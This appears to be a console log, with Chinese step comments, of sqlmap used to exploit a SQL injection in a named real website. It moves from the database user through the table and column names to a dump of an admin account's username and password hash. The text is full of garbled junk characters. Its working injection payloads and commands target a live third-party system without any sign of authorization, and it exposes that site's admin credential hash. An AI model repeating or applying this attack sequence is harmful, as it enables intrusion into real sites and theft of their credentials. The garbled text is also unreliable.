D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
# H- v0 R2 i) i. ]$ |ms "Mysql" --current-user /* 注解:获取当前用户名称
# U/ X" u* h; u& a2 ` sqlmap/0.9 - automatic SQL injection and database takeover tool
1 z# m Q7 H: G http://sqlmap.sourceforge.net starting at: 16:53:54) O$ @& G, i' i" Z, ~; E
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as3 d$ C3 [/ q5 D, [
session file
+ y |1 Q# T# i& e' F' x8 ?7 _[16:53:54] [INFO] resuming injection data from session file I2 s, C! @% ~3 J
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
: |: B I8 ~1 G% d[16:53:54] [INFO] testing connection to the target url' `& z6 Z i4 o4 H4 S1 L+ W
sqlmap identified the following injection points with a total of 0 HTTP(s) reque/ l3 S& m7 k5 r! r" F4 W2 o
sts:7 z: o" G* j( ~6 a2 ^9 R
---
9 `4 `$ |/ T. f) N1 x! W; S# aPlace: GET" U. P/ P) O) b$ r5 N1 Y% N" J e. W. b
Parameter: id" A B# A5 T; @! O; a2 A$ h# y
Type: boolean-based blind
& t- G- ^; [* A0 M6 Q+ P8 i: L1 Q Title: AND boolean-based blind - WHERE or HAVING clause
/ C9 x! f) n& t( e Payload: id=276 AND 799=799
+ F L+ T; _/ A- E% c4 [ Type: error-based
: j" t1 b' e* Q k8 w% }6 E Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause3 ~- S+ S6 n5 e; h/ w7 N
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
# R8 @8 p; Z4 _% q# v) Y% \; c120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,587 @5 |! c# U- l2 Y+ v5 X# O
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)6 F i) U6 j, ]0 u1 e5 |: x6 F
Type: UNION query+ Q, w d1 ]$ |4 D6 |! _
Title: MySQL UNION query (NULL) - 1 to 10 columns
" N; \" H! Y- H& b2 Q) J: \ Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
2 i* s, V$ D* ]- r0 N- @, N+ ^(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
" u- s% ^; y4 w( M. E, PCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
- ~; G" L4 A5 H s8 S( v6 n: C Type: AND/OR time-based blind6 W$ O0 l8 p& R0 A( u% o
Title: MySQL > 5.0.11 AND time-based blind
! w, | o) e$ a# p2 r3 w* H/ q Payload: id=276 AND SLEEP(5)
0 e4 y# \) n2 q: w+ x---0 R4 e* ~, m8 \% y2 P) N! o
[16:53:55] [INFO] the back-end DBMS is MySQL
4 j2 E. m( B( Z) s; t4 |web server operating system: Windows
( c; a5 Y' \& `& |, v. C7 h u( dweb application technology: Apache 2.2.11, PHP 5.3.0! w* C7 _; Z1 y/ \6 C4 U6 P$ c5 e! {
back-end DBMS: MySQL 5.06 O7 G. G7 `: z$ |) O* {! [6 `
[16:53:55] [INFO] fetching current user
* S8 i; Y' l$ G X7 K% Kcurrent user: 'root@localhost'
0 ~8 t- F+ {/ u/ c" [* K[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou+ n4 ^. b# g/ ~( C- B
tput\www.wepost.com.hk' shutting down at: 16:53:580 a. [1 o) M8 M* m9 ]/ [
; ^) Q/ Z' y# T( f( _D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db& t% m. X. |9 J- x) S8 F3 }: V
ms "Mysql" --current-db /*当前数据库
8 h# y0 P) r8 w6 T( _ sqlmap/0.9 - automatic SQL injection and database takeover tool
3 G. x' B n1 B# a2 X http://sqlmap.sourceforge.net starting at: 16:54:168 Q) [* P4 e7 v$ V; \; E5 C, [
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as% A( s S0 `+ Y/ O
session file
1 y2 S3 }% @, Z& Y$ |6 h[16:54:16] [INFO] resuming injection data from session file
; [( T+ |; d% j[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
( e) E# S( `' ?% ?+ l, M[16:54:16] [INFO] testing connection to the target url6 G( C0 R6 M! `; H
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
4 Z, \1 B1 B9 {0 ?sts:: f8 y6 P( F5 l. j) V. w% D
---. i" \! a) A. Z* D ?; r
Place: GET7 Z7 d( W' f% e" `5 s) d
Parameter: id y3 z( }/ |7 T+ V
Type: boolean-based blind, L$ h6 s, s4 | R8 D
Title: AND boolean-based blind - WHERE or HAVING clause
- k" C( v( `( A$ m Payload: id=276 AND 799=7994 n1 v# Y- D& k m, w" Q. U
Type: error-based
& `3 H; s6 [! {1 f7 K3 i& M: u2 O0 D Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
, `6 X( v W2 o" o' y Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
$ m- X5 _. u4 v, ]+ }) k120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
. r$ }' v/ P9 b6 l. I/ m),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)9 B4 T _5 Q8 c: p5 A1 y
Type: UNION query R8 i% T3 p' S3 Z7 m2 H
Title: MySQL UNION query (NULL) - 1 to 10 columns N% Y2 C1 u- l% U# v! X
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
" F5 T. b9 m1 v) I% U: i" Q- P) ?(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),1 Q# v A7 y' L+ R2 w4 k. ^/ |
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
9 a: \1 e( ?# J7 q, E# a Type: AND/OR time-based blind
' k. R+ k. M- x- y8 d' I2 k Title: MySQL > 5.0.11 AND time-based blind
9 I6 Z" ~) I% q Payload: id=276 AND SLEEP(5)
; E( c* G) U8 f3 {5 D6 `/ L---0 Q4 \1 d+ l$ [* x$ `! y
[16:54:17] [INFO] the back-end DBMS is MySQL1 n3 C) ^' @+ i" _- D
web server operating system: Windows; C3 r& w* d1 c& |
web application technology: Apache 2.2.11, PHP 5.3.0
: [7 s. z, Q1 ~' z+ Lback-end DBMS: MySQL 5.0/ z8 R" s4 }9 s3 D, l: D; R
[16:54:17] [INFO] fetching current database
& a1 D4 P* q! M$ acurrent database: 'wepost'
: Q; C+ Q! P2 ?( e& t0 _ u[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou' i0 l `$ t" ?9 c, x- H
tput\www.wepost.com.hk' shutting down at: 16:54:18
% j8 [9 J' e0 O" z9 @: L3 qD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
" Q* s( f) f \ A" A6 M: ~ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名8 m0 ?7 v6 n( O& G/ |3 h. m0 i
sqlmap/0.9 - automatic SQL injection and database takeover tool, |* i' w% m6 r/ R3 U
http://sqlmap.sourceforge.net starting at: 16:55:25
% T' Q! t- c* p[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as( s+ r( E. F9 _$ y% s: w8 O- G
session file
0 `/ l. |. h) X/ v2 R/ a[16:55:25] [INFO] resuming injection data from session file* _& K* ?3 L' L3 B, w
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
- f( T. F0 b' I5 a9 d1 K0 l[16:55:25] [INFO] testing connection to the target url
% G8 u' o7 G+ Q! gsqlmap identified the following injection points with a total of 0 HTTP(s) reque4 f- G) a" m5 x/ }- s9 r B
sts:
( v/ E$ Y* I& v' e$ |- r. ?---
F; ~; o& R. U/ k( xPlace: GET+ M, ~: r, Z6 b) _' }
Parameter: id0 F0 A" X8 _2 |1 R$ G! J1 i# D
Type: boolean-based blind
6 b. z# `8 I5 j2 f( z* R2 k Title: AND boolean-based blind - WHERE or HAVING clause
' y+ B! e; X6 Y# |( @ Payload: id=276 AND 799=799
9 e: w4 z3 `- Q1 q0 p Type: error-based
9 i; O0 j9 P3 }6 |" D6 f9 r Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause; P: d! t a% m3 T Z$ a& \! m& N2 L
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
' o, Q6 R( W4 F( s1 ]120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58+ _' }0 h! \; R" E. K
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) s4 K; }. {: \, a4 u) _# m: H$ D
Type: UNION query1 d/ K( C# \7 {5 W! w
Title: MySQL UNION query (NULL) - 1 to 10 columns# W0 K' l& y, x! x* J4 Z5 E# X; n
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR% I' U% H- s- g, r+ {
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),) E6 {& D# L; f+ P
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#: j9 F% b; a& O% N) _, O+ ^
Type: AND/OR time-based blind
5 h- {! t* |+ x$ C Title: MySQL > 5.0.11 AND time-based blind
9 q, `* a1 K6 d& T8 E Payload: id=276 AND SLEEP(5)0 m' W! P3 i% Q: I
---" Z- B0 W& n5 l9 P- G
[16:55:26] [INFO] the back-end DBMS is MySQL! G) ~8 E, B6 j% ~ a0 i2 |6 y( h
web server operating system: Windows
/ L7 }# A+ d7 [0 @, Dweb application technology: Apache 2.2.11, PHP 5.3.0
+ f8 F) r2 h5 p& ^back-end DBMS: MySQL 5.0
/ [# O. V" T# G, I/ X[16:55:26] [INFO] fetching tables for database 'wepost'1 }1 f5 j1 g. |1 ]
[16:55:27] [INFO] the SQL query used returns 6 entries
# n$ @3 F( `3 o2 w% F: T$ WDatabase: wepost0 T& I$ T# i" k0 A2 b' e; t: m
[6 tables]
2 w6 z6 r* ~, a/ U3 I+-------------+$ s2 c8 H. y3 O% \. o- z9 O$ ^
| admin |& B% [; y# ^, \7 S" q
| article |
4 S0 j6 u! x3 q" C$ ~" g" o- \7 p1 i| contributor |6 G' i$ o0 f( O
| idea |
0 R3 d7 H2 J5 m+ l; M; L2 U7 Y! d3 }1 H| image |. _2 o" W& n1 Y) }
| issue |
( N9 Z. K% N1 d0 y t1 L+-------------+4 W+ D( d0 n2 E e
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou$ q3 b; d1 T" T5 k2 ^) o
tput\www.wepost.com.hk' shutting down at: 16:55:332 F1 X; a$ s5 F4 T' h
6 v+ d9 K: X4 i5 ~3 e; @! jD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
8 l" X9 d2 c/ j, J% Ims "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
9 _7 M& _: D7 C( A# d' C sqlmap/0.9 - automatic SQL injection and database takeover tool9 S8 l$ [$ ]5 O
http://sqlmap.sourceforge.net starting at: 16:56:06 S1 Y7 W1 p* }3 D, f8 X
sqlmap identified the following injection points with a total of 0 HTTP(s) reque: J: W, {$ x2 Z! R. }
sts:
5 O8 y: I6 s$ V; v# n$ h---. n. R4 _1 l2 w' T' i8 W
Place: GET& k! D" d! N+ U) ?. {3 D
Parameter: id
* Y# `4 j; z, W. y Type: boolean-based blind8 n0 T# ^6 O7 @% p7 i
Title: AND boolean-based blind - WHERE or HAVING clause
- \4 S) i) ~6 \0 s: A" p( p Payload: id=276 AND 799=799& [) \3 Y9 X, g
Type: error-based: m+ Y( @- k3 X! T. C* u2 c
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause! Z2 {* \) U m0 |0 s$ g! O
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,* ?/ |+ }9 D; N- w% V
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,584 `" l# \% ^! O& k% ^: v" B
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)0 ]" ^: M- ]5 V' @, I- H
Type: UNION query
% z$ h) x4 \+ r r4 V7 _ Title: MySQL UNION query (NULL) - 1 to 10 columns
l/ I8 W7 T+ _4 ~) m1 Z0 k- P Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
( ~5 l9 P9 R# n* E: D; O- k3 U(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
1 s/ ^% C% L* q$ u' M$ S/ z: K8 BCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
! B6 ^2 H/ K4 y Type: AND/OR time-based blind
+ h; s$ j! K# E! w) H% k( H0 _ Title: MySQL > 5.0.11 AND time-based blind
8 T4 S9 e- j: |4 }2 u Payload: id=276 AND SLEEP(5)
* ]$ r8 c5 e. Q" y---. G" X/ F% O$ K- k) G2 \
web server operating system: Windows& r3 Y8 A5 q( c
web application technology: Apache 2.2.11, PHP 5.3.0
1 S2 \# Z( d* Y4 Aback-end DBMS: MySQL 5.0* e2 k' B9 w6 u% }
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
3 w3 D) F, I1 u4 Rssion': wepost, wepost
) X- e" g4 E. lDatabase: wepost
9 p; V% y+ {$ Y5 |Table: admin
+ ?; X. k4 d: e( u0 k. C" G[4 columns]
/ o+ G2 H& g) Y$ M9 q0 J1 l+----------+-------------+
5 c. t0 S3 @6 w+ I& Q. l| Column | Type |
* R' b; M8 r _: f( ~" H0 a+----------+-------------+ X; S7 B6 x" Y5 h6 O; ]2 u; }$ |5 P' l
| id | int(11) |) G, D# X. e- n6 x6 p
| password | varchar(32) |( j! L- j. e" d
| type | varchar(10) |
3 ?& P1 T4 L9 ?9 l| userid | varchar(20) |
/ Q6 o, m0 n0 @0 [+----------+-------------+
) @4 ]) G' M6 H* g T shutting down at: 16:56:19
) T& u# ]. A3 q" E/ ]% v0 r8 {7 g9 C2 x2 x( R. x
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db @1 B& {( S* G
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
# `& ?- A6 Z2 F+ p8 u sqlmap/0.9 - automatic SQL injection and database takeover tool W% N$ e- x! }4 }! r! r: k$ F% @
http://sqlmap.sourceforge.net starting at: 16:57:14& i9 n4 t. m; A8 I
sqlmap identified the following injection points with a total of 0 HTTP(s) reque& u+ D1 }. i3 _9 A" k6 C; n* m
sts:
S9 [ x' x; o---& }. S9 ~1 _8 g% A
Place: GET
% O! i) b% h: T# uParameter: id5 B: m% ?3 h% s- a1 ?
Type: boolean-based blind
1 X: C2 H" @/ o; q Title: AND boolean-based blind - WHERE or HAVING clause
) @: |) Z% c' O. o# U) j Payload: id=276 AND 799=799+ z; @: ~# \( I6 j
Type: error-based
# i) G8 r9 ?6 E( A. x* g- v Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause7 W* a( o2 F( @+ a1 e- }7 Z/ h
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,2 S1 Q* c, I: U4 p
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58% R$ P' |: L( Y
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
: G+ {& L* v7 D) z. Y Type: UNION query! A- Q( ]: q; e/ y5 Y3 u
Title: MySQL UNION query (NULL) - 1 to 10 columns
3 l# I- T/ b! a' o Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR5 C% v8 e. G4 `# g
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
8 W& e+ v( c2 v D. t$ jCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
4 R. a! i5 f6 g0 d) L7 g Type: AND/OR time-based blind9 Y% W% c; _. O3 v/ F/ ^
Title: MySQL > 5.0.11 AND time-based blind. f% \% J1 L; L" i
Payload: id=276 AND SLEEP(5)
5 o2 F8 C0 ^, ?9 K3 v---5 S1 B5 u! b; ]" f8 H
web server operating system: Windows
% z* ^3 [+ z: |+ w5 f) iweb application technology: Apache 2.2.11, PHP 5.3.0
( _: F, }* p% f* Q' N5 n& gback-end DBMS: MySQL 5.0& i, O }6 w3 K3 E3 I7 \5 D. @& c7 M
recognized possible password hash values. do you want to use dictionary attack o' O/ J0 o" p, L1 ?
n retrieved table items? [Y/n/q] y' p( A, H9 L5 t8 ~! W1 ]2 E
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]3 l! [. V% ?* w8 p. e
do you want to use common password suffixes? (slow!) [y/N] y
8 u: ~( @1 y- ]2 ]6 h7 Y6 zDatabase: wepost
4 l' ^% a1 v/ A( L1 l8 v- vTable: admin
* E+ |* S6 T* D' X4 m2 k[1 entry]1 Z8 Z/ L6 D2 y, M7 t1 ?' ^
+----------------------------------+------------+1 ]; ^1 d5 g9 F" w% H. O
| password | userid |
; S0 _1 c% M2 j* Z2 x( f# z+----------------------------------+------------+ h$ t5 D0 _/ i4 { w1 _ b
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
- U ]0 _) D2 o5 p# Y% }+----------------------------------+------------+, n" I8 j% ] `6 I; q
shutting down at: 16:58:14
% x5 [0 t8 I: A% j! m' ]+ L3 x& }* E3 [/ J5 x6 K
D:\Python27\sqlmap> |